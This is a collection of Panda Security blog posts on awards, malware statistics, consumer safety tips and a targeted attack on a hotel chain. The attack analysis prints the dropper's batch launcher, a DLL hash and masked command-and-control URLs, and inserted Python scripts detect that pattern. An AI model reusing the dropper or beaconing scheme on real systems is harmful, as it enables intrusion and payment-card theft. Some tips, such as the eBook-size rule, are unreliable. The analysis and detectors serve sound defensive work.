Tag Archives: Panda Security

Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento”

Panda Security has been awarded Company of the Year at the 5th Annual “Premios Nacionales El Suplemento”.

Organized by the Spanish newspaper El Suplemento by ABC, the “Premios Nacionales El Suplemento” give well-deserved recognition to outstanding businesses and their hardworking professionals who, despite the current economy, are boosting their efforts to be better leaders, step up and grow on a daily basis.

The gala honored 34 winners, with one winner in each category. Panda Security was awarded the night’s most coveted prize: Company of the Year. The company joined a group of exceptional winners—highlighting important professionals and Spanish companies, or businesses with headquarters in Spain—who have excelled in different sectors by their innovative work, growth, outreach, and history.

 


Center: Rosa Díaz, the General Director of Panda Security Spain, collected the award on behalf of the Bilbao-based computer security company.

Although Panda Security is mostly known as an anti-virus software company, it has expanded its line of business to advanced cyber security technology. Rosa Díaz said that, thanks to Adaptive Defense 360, Panda is a pioneer in uniting EPP and EDR systems in the same solution.  The new security model is capable of monitoring, registering and categorizing all active processes on the system.

This year, some of the highlighted winners include Turkish Airlines in the “Airline” category, the NGO Messengers of Peace in “Solidarity”, and Kone for its work in “Sustainability”, among others.

Technological milestones deserve an award

Panda Security is one of the leading manufacturers of security software in the world. They are included in Truffle 100’s list of Top European Software Vendors.

Among its milestones in technology, the pioneer has also launched security systems with concepts like SaaS (Security as a Service), or the anti-virus that protects from the Cloud (Cloud Computing). Panda is also recognized as the first security service provider to offer daily updates of its signature database.

Panda Security also introduced the first automatic detection, analysis and classification of malware in real-time for systems. This is called “Collective Intelligence” and, together with patented technology that blocks unknown viruses, is the precursor of Panda’s new security model: Adaptive Defense.

It is our desire that these awards will encourage professionals and companies to continue their innovation, outreach and good practices.

 

Congratulations to all the winners!

The post Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento” appeared first on Panda Security Mediacenter.

Panda Security, the tested anti-virus


Be careful! Not all anti-virus systems are what they seem, and many are more hazardous than helpful for your cyber security, according to a recent investigation. The investigation concluded that, today, most anti-virus products tend to lower the threshold of Internet browser security. Can they protect us against external threats? How effective are they?

Traditionally, browsers incorporate tools to check the certificates presented by websites to ensure that they have been issued by an appropriate entity. Panda Security’s products do not use intrusive interception techniques, such as man-in-the-middle through TLS proxies, to analyze our customers’ communications. Our solutions are completely transparent and do not install any type of certificate for this function. Thanks to this we can avoid this type of vulnerability, while minimizing the impact on communication performance for our users’ devices. For this reason, Panda solutions are not included in the study.

Panda Antivirus, the “nonvulnerable”

Panda’s products are mentioned as those not affected by this vulnerability in Concordia University’s report.

The affected anti-virus systems in the study trick browsers, causing them to relax and trust any certificate, even though they shouldn’t. In contrast, Panda Security solutions appear in this report because of their transparency and reliability for users.


Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

[Image: the document shown to the victim]

This is a hotel reservation form that is to be filled out by a customer with their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite showing the Word icon, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

    @echo off
    start "" ROCA.ING.docx
    Set xOS=x64
    If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
    IF "%xOS%" == "x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
    IF "%xOS%" == "x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
    ping -n 12 localhost

As we can see, the first thing it does is open the Word document, so that the victim sees the expected form and the trick is complete. Then adobeUpd.dll is run with the parameter “Wenk”. When executed, it modifies the file, marking it as read-only and hidden, and creates an entry in the Windows registry so that it runs every time the computer is turned on.
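One way to hunt on endpoints for the launch pattern used by reader_sl.cmd, as an added example that is not part of the original post: it flags process-creation records in which rundll32.exe is handed a DLL by relative path or from outside the Windows directory. The record layout, host names and the DLL path in the third record are constructed for illustration.

```python
import ntpath
import re

# A rundll32 invocation: optional quotes around the paths, then "<dll>,<export>".
RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+)"?\s*,\s*(?P<export>[#\w]+)',
    re.IGNORECASE,
)

WINDOWS_DIR = "c:\\windows\\"

# Constructed process-creation records. Host names and the third record's DLL
# path are made up; the first command line mirrors the one in reader_sl.cmd.
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-03",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk"},
    {"host": "FRONTDESK-03",
     "cmdline": r"C:\Windows\System32\rundll32.exe "
                r"C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl"},
    {"host": "BACKOFFICE-11",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" '
                r'"C:\Users\Public\Documents\update.dll",Start'},
    {"host": "BACKOFFICE-11",
     "cmdline": r"C:\Windows\System32\notepad.exe notes.txt"},
]


def classify_dll(dll_path):
    """Return a reason string if the DLL location is suspicious, else None."""
    # A bare file name is resolved by search order, so a DLL dropped next to
    # the script (as adobeUpd.dll is here) gets loaded from the working directory.
    if not ntpath.isabs(dll_path):
        return "relative DLL path"
    # System components live under the Windows directory; anything else is
    # worth a second look, in particular user-writable locations.
    if not ntpath.normcase(dll_path).startswith(WINDOWS_DIR):
        return "DLL outside the Windows directory"
    return None


def find_suspicious_rundll32(events):
    """Return (host, dll, export, reason) for each suspicious rundll32 launch."""
    findings = []
    for event in events:
        match = RUNDLL32_RE.search(event["cmdline"])
        if not match:
            continue  # not a rundll32 "<dll>,<export>" invocation
        dll = match.group("dll").strip()
        reason = classify_dll(dll)
        if reason:
            findings.append((event["host"], dll, match.group("export"), reason))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_rundll32(SAMPLE_EVENTS):
        print(finding)
```
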

It then contacts a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

The content it downloads is checked for the user given in the URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file:

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be on our customer’s system either, as we blocked the infection attempt and the malware was not able to run there. The domain in the URL is exactly the same as our customer’s domain, except that the customer’s ends in “.com” while the attackers registered a domain with the same name in Gabon (“.ga”). This way, the similarity of the domain name won’t attract attention if the hotel’s security team sees it when analyzing network traffic.

Although the file iPmbzfAIRMFw.jpg is not available, if we look at the code of adobeUpd.dll we can see that it looks for a specific mark in this file, then decrypts the data from it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is specifically directed at this hotel chain. The criminals have already removed all traces of the server the malware connected to, and as we aborted the attack we can only speculate about what they were going to do next. In our experience, this type of attack seeks to compromise a computer in the victim’s company and then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.
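The network side of this attack, a host with the organization’s own name under a different top-level domain that one machine keeps contacting at irregular intervals, can be searched for in proxy logs. The following is an added example, not code from the original post; the log format, client addresses, the placeholder domain examplehotel.com and the identifier CONSTRUCTEDID are assumptions, and the suffix split is deliberately simple (it does not handle multi-label suffixes such as .co.uk).

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: the organization's own domain. Placeholder, because the post
# masks the real name.
OWN_DOMAIN = "examplehotel.com"

# Constructed proxy log, one request per line: "<epoch seconds> <client> <url>".
SAMPLE_LOG = """\
1464000000 10.0.4.21 http://www.examplehotel.com/en/rooms
1464000030 10.0.4.21 http://www.examplehotel.ga/en/scripts/en.php?stream=lcc&user=CONSTRUCTEDID
1464000060 10.0.4.21 http://www.examplehotel.ga/en/scripts/CONSTRUCTEDID.jpg
1464000300 10.0.4.21 http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=CONSTRUCTEDID&type=YFm
1464000710 10.0.4.21 http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=CONSTRUCTEDID&type=YFm
1464000895 10.0.4.21 http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=CONSTRUCTEDID&type=YFm
1464000900 10.0.7.3 http://news.example.org/index.html
"""


def name_and_suffix(host):
    """Split a host into (registered name, top-level domain), ignoring subdomains."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def is_lookalike(host, own=OWN_DOMAIN):
    """True when the host carries our name under a different top-level domain."""
    name, suffix = name_and_suffix(host)
    own_name, own_suffix = name_and_suffix(own)
    return name == own_name and suffix != own_suffix


def find_lookalike_contacts(log_text, own=OWN_DOMAIN, min_hits=3):
    """Group requests to look-alike hosts by (client, host).

    The gaps between requests are reported rather than tested for a fixed
    period, because the loop described above connects at random intervals.
    """
    seen = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3 or not parts[0].isdigit():
            continue  # skip malformed lines
        timestamp, client, url = int(parts[0]), parts[1], parts[2]
        host = urlsplit(url).hostname
        if host and is_lookalike(host, own):
            seen[(client, host)].append(timestamp)

    report = {}
    for key, stamps in seen.items():
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        report[key] = {
            "hits": len(stamps),
            "intervals": gaps,
            "repeated": len(stamps) >= min_hits,
        }
    return report


if __name__ == "__main__":
    for (client, host), info in find_lookalike_contacts(SAMPLE_LOG).items():
        print(client, host, info)
```
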

The traditional anti-virus does not work against this type of attack, since these are threats created specifically for a victim, and the attackers always ensure that the malware is not detected by the signatures, proactive technologies, etc. that current anti-malware solutions have built in. That is why EDR-type services (Endpoint Detection & Response), equipped with advanced protection technology, are vital for effective protection against these attacks.


Cyber-criminals really “Like” Facebook


With 1,590 million active users per month, Facebook is the Social Network. In fact, they just posted their quarterly earnings and they are up 50%. Cyber-criminals are aware of their success.

These platforms are the ideal place to “phish” for information. 18% of companies infected by malware were infected through social networks. Attackers pose as part of a company’s customer service team in order to steal sensitive data from consumers.

A recent study was released by the RSA organization proving that cyber-crime on social networks is a “global epidemic”. The RSA organization was founded by the creators of the encryption algorithm that is used every time we make a bank operation online or digitally sign something.

Cyber-crime in social networks is a “global epidemic”

These platforms are not only hot-spots for attacks but they have also become the perfect forum for scammers to communicate. According to the study, there are more than 500 online fraud related groups with more than 220,000 members. The majority of these groups are public and visible.

Uncovering Credit Card Data

Fraudsters share information like credit card numbers accompanied by personal information and authorization codes, cyber-crime tutorials and other malware tools.

Proving this, the investigation invites us to write our CVV or CVV2 numbers in the Facebook search bar (those verification numbers on the back of a credit card). The result will surely surprise you: it is easier to find data from a stolen credit card than find an old friend you are trying to reconnect with.


In total, RSA detected some 15,000 compromised credit cards publicized on social networks in the six months that the study lasted. It also discovered that many of these criminal groups focus their attacks on shops, banks and accounts of consumers in their area.

In China and Russia, platforms QQ and VKontakte are preferred by the scammers, while in the rest of the countries, Facebook remains the favorite. Unfortunately for us, cyber-criminals really “Like” Facebook.


PandaLabs identifies 227,000 malware samples per day in the first quarter of 2016

PandaLabs, Panda Security’s laboratory, outlined in this report the main cyber-security developments over the first months in 2016, showing statistics of malware and cyber-attacks in the first quarter of 2016. The amount of malware created continues to break records, with more than 20 million new samples identified, an average of 227,000 per day.

Cyber-crime does not stop

Cyber-criminals continue attacking without giving sensitive infrastructures the chance to take a break, as seen in the attack suffered by 21st Century Holdings, a clinic specialized in cancer treatments with headquarters in Florida. The clinic had to alert their 2.2 million patients and workers that their personal data might have been compromised.

The Rosen Hotels & Resort chain has been the victim of an attack that occurred between September 2014 and February 2016. The company alerted their clients who may have used a credit or debit card in their establishments over this time period that their data could have been stolen by the attackers.

Even the world’s most powerful governments haven’t been spared, such as the United States, where the Department of Defense has presented a rewards program called “Hack the Pentagon” in which rewards are offered to hackers who find security holes in the Pentagon’s web pages, applications and networks.

Smartphones are another easy target for cyber-criminals. SNAP is the name of a vulnerability that affects the LG G3 phones. The problem is due to an error in the implementation of LG notifications called Smart Notice, which allows JavaScript to be executed.

The growing Internet of Things sector is also affected by this year’s criminal activity. In this area, we can see how something as innocent as a doorbell can be attacked. Manufacturers are becoming more aware of their products’ safety; in fact, General Motors just launched a new rewards program for hackers who are able to find vulnerabilities in their vehicles.

Q1 in numbers

The PandaLabs study shows that Trojans continue to be in the lead of all malware samples. Out of all malware samples created in 2016, Trojans are number one with 66.81% of the total (an increase compared to last year), followed by viruses (15.98%), worms (11.01%), PUPs (4.22%) and Adware/Spyware (1.98%).


 

When we analyze the infections caused by malware worldwide, we find Trojans in the lead again. This is normal if we take into account the rise in ransomware infections, which are counted among Trojans and are also one of the most popular attacks cyber-criminals use because it allows them to obtain money easily and securely. There are more and more companies whose networks are falling victim to these cyber-criminals and who are paying millions of euros to rescue their stolen information.


According to PandaLabs, Asia and Latin America are the most affected regions

In this study we can find a table showing the countries with the highest and lowest infection rates in Q1 of 2016: Asia and Latin America are the most affected regions (China leads the ranking with 51.35% of infections), while the Scandinavian countries have the lowest infection rates (Sweden is the lowest at 19.80%).

 

If you want to know more about the specific attacks, be up to date with the latest research carried out by the FBI, and the latest news of the cyberwar, you can download the entire document here. We hope this is of interest to you!


Science is one step closer to reading your mind


Fiction predicts Science

This past month, there was a giant development in science.  Once again, technology has caught up to what we thought was only imaginable. For the first time in history, a quadriplegic recovered mobility in one of his hands thanks to neuroprosthetics, which in this case, is the superhero combination of an implanted brain-chip and a sleeve made of electric bands.

Ian Burkhart, a 24-year-old American man, is paralyzed due to a spinal cord injury that was caused from a diving accident a few years ago.  What at first seemed like a hopeless predicament for him, has become a positive example for science and humanity.

Mind over Body

Burkhart continues to live a life of passion and purpose—coaching high schoolers, inspiring others through public speaking, and working towards his undergrad degree—while living by the quote “Success, it’s what you do with what you got”.

Swiping a credit-card or playing a bit of Guitar Hero are two simple things Burkhart thought he would never be able to do again.  He has been able to train his brain to exercise commands, which are later carried out using the implanted chip and electrode sleeve.  According to scientists, in a few years, many disabled and paralyzed people could be dressing and feeding themselves, completely independently.


Work like a machine, or one day we could be controlled by one.

But, as always, with each new advancement comes challenges and opportunities for those who are looking to take advantage.  Which is why it is critical that we protect the sensitive data that has yet to be compromised: the information that is stored in our brains.

Expert Alfonso Muñoz, from Criptored, explained how EEG headbands are vulnerable to the same attacks as your smartphone or your computer, stating that “any type of attack can happen because, really, you are not copying waves, you are copying bits”. The security-risks associated with the possibility of registering brain waves are alarming. Muñoz warns about the future of “mental surveillance” and “brain hacking”.

Imagine that someone, somewhere could read your mind… spy on your thoughts. This fear has already been proven in rigorous academic studies. In this ongoing marathon between humans and technology, even with the good, we must stay wary of possible intruders. Like Muñoz said, “attacks have limitations”. However, “the truth is, the thought that it can be done, in a relatively simple way, is scary”.

Information from your brain can be removed without you knowing it


Tips to help protect your professional Apps


Smartphones have become vital to our existence, accompanying us in our day-to-day lives, both at work and at home. Since May 1st is International Workers’ Day, we are celebrating by reviewing some of the top applications we believe are most useful for our professional success.

“Top” Apps for professionals

These app icons saturate our phone screens, but with good reason. Today, there is an app for everything. Apps offer a wide range of possibilities and solutions, helping us organize our tasks and merge our professional and personal lives.

  • Evernote: Positioning itself as the office of the future, this app allows you to write, compile, find and submit documents in any electronic device working in a synchronized manner.
  • Google Drive: Through the app you can create and access shared information through any device, making long-distance teamwork both easy and efficient.
  • Dropbox: This mass storage tool is one of the more popular apps, allowing you to share information using multiple devices.
  • Skype: With more than 300 million users, the mobile app includes many of the same benefits as the desktop version like video calls, audio calls, and messaging. This program has become an important tool for those who have work relationships abroad.
  • Hootsuite: This platform allows you to access various social media accounts from one place. It has become one of the star tools to manage your online social life, both for social network experts and regular users.
  • Salesforce: We cannot lose sight of one of the best business tools for CRM. This important application provides an interface for task management and case management. It also has a customer portal area, with social media plugins and analysis tools, allowing us to foster relationships with our clients and develop new ones.

Black Hats in your work environment?

 

Even though we do our best to make our Smartphones as secure as possible, sometimes there are vulnerabilities, like large amounts of malware waiting to take over your phone. As seen above, there are a variety of applications waiting to be downloaded and used to help you on your journey up the career ladder. However, we must keep in mind that there are some risks that come with installing anything downloaded off the internet.

Black Hats frequently use apps as keys to “get into” our phones. If you use them as work tools or to share sensitive and private data, you should think about downloading an antivirus.

We have some tips for downloading these applications. First of all, “avoid the black market” and download your apps from authorized stores that are reliable. Secondly, choose apps with official developers (these will always be more secure). Thirdly, pay attention to the number of downloads (if there are more than 1,000, we can consider it a popular app that is less likely to cause problems). Lastly, review the feedback from other downloaders to make sure it is a good one.

Current Smartphone attacks have put device security and personal information in danger, which is especially hazardous when your devices are connected with your work-life. Prevention is the best possible thing you can do to guarantee your security.

Here at Panda Security, we hope you continue in the fight against cyber-threats and keep on protecting your work-life. Have a great weekend and a wonderful International Workers’ Day!


The Hotel Sector: an easy target with juicy profits

Stealing information and then holding it for ransom is a trendy cyber-attack that has arrived in the hotel sector. PandaLabs, Panda Security’s anti-malware laboratory, is launching a study called The Hotel Hijackers (download our guide here); a document that reviews the increasing tendency of cyber-attacks directed towards large hotel chains.

Research showed us that 2015 was the year for this type of attack, and we have detailed information on this type of intrusion and how this sector was largely affected worldwide, in many famous hotels like the Trump, Hilton and Starwood hotels.

Why the hotel sector?

Hotels make billions of dollars from the millions of guests that pass through their doors everyday and hotels keep all of their guests’ sensitive data on file, just waiting to be compromised, and cyber-criminals know it.

If you want to take a look at The Hotel Hijackers, download our infographic or video:

 

 


If you find a USB stick, resist the temptation to open it


 

Beware of infected storage devices: USB flash drives, Floppy disks, CD-ROMs

Classic tricks never go out of style. A favorite trick in the cyber-crime world is done by infecting USB flash drives (or whatever method of storage that is used at the time… remember floppy disks and CD-ROMs?) to cast a malicious program onto the victim’s computer by taking advantage of our biggest human weakness: curiosity.

 

Maybe you think that there are only a few who would fall into these traps, but the truth is that it’s a common occurrence. A group of researchers from the University of Illinois tested people’s “curiosity” and came up with an interesting conclusion: almost half took the bait.

 

Curious by nature

The study’s author spread 297 USB flash drives across campus to see what would happen. Almost half of the devices (48%) ended up in the USB port of someone else’s computer. Most of them later claimed that they plugged-in the USB in order to find its rightful owner and return it to them (68%). 18% admitted they did it out of curiosity.

 

The most alarming finding is not the number of people who fell into the temptation to look at what was stored on the device, but that they would look without taking proper precautions. Only ten people analyzed the USB stick using an antivirus.

 

Only ten people used an antivirus while examining the contents of the USB stick

 

The five most naive victims admitted that they completely trusted their operating system, which, unfortunately, was too hopeful. As the prestigious security expert Bruce Schneier stated, “the problem isn’t that people are idiots […] The problem is that operating systems trust random USB sticks.”


Tips to help shield your reading devices


Today, April 23rd, we celebrate World Book Day. Literature has evolved greatly in recent times, both in the way we enjoy it and the way we consume it. How we read, in the digital realm, has changed. In today’s on-the-go society, it is becoming less and less common for people to use paperbacks or hardcovers, and is becoming more and more common that we use many different platforms to enjoy reading. Now we read from our smartphones, tablets, eBooks … Electronic ink has been imprinted in our lives. We read everything and anything from short stories to novels, the news to blogs… we turn them into trending topics. We even share excerpts from the books we read on social media. Stories become viral thanks to transmedia storytelling and techniques.

Not only are we seduced with words, but audiovisual content plays a very important role in grabbing our attention. New technology enriches our reading, using videos or photos to interact with the reader. We live in the era of Branded Content. Struggling brands position themselves in a way that seems “organic” in the minds of consumers by offering unique and high-quality content. Now we are fluent in a new language: digital language, the language on which today’s literature is based. We write more simply and add hyperlinks. Digital writing is intended to be enjoyed only on-screen, 100%.

Tips to safeguard your reading device

We often forget that a computer virus in Windows can be passed to a smartphone whether it’s an iOS or Android, and a lot of these viruses can even infect our eReaders. To prevent malware from damaging our reading device, whatever it is, we must follow these guidelines:

1- Beware of USB ports: we must first analyze anything that can be inserted into a computer or electronic device. This is the simplest and most popular way cybercriminals can infect our devices.

2- Only buy or download eBooks from legitimate online stores or known editorial pages.

3- Beware of file size: if we introduce some eBook DRM we must be wary if it occupies more than 2Mb, as it could possibly be a virus that could damage the device.

4- Install an eBooks library manager: if the eBook is a virus or has one, the manager will alert us.

Like always, prevention continues to be the best option to help us enjoy our reading (or browsing) safely. Happy World Book Day!
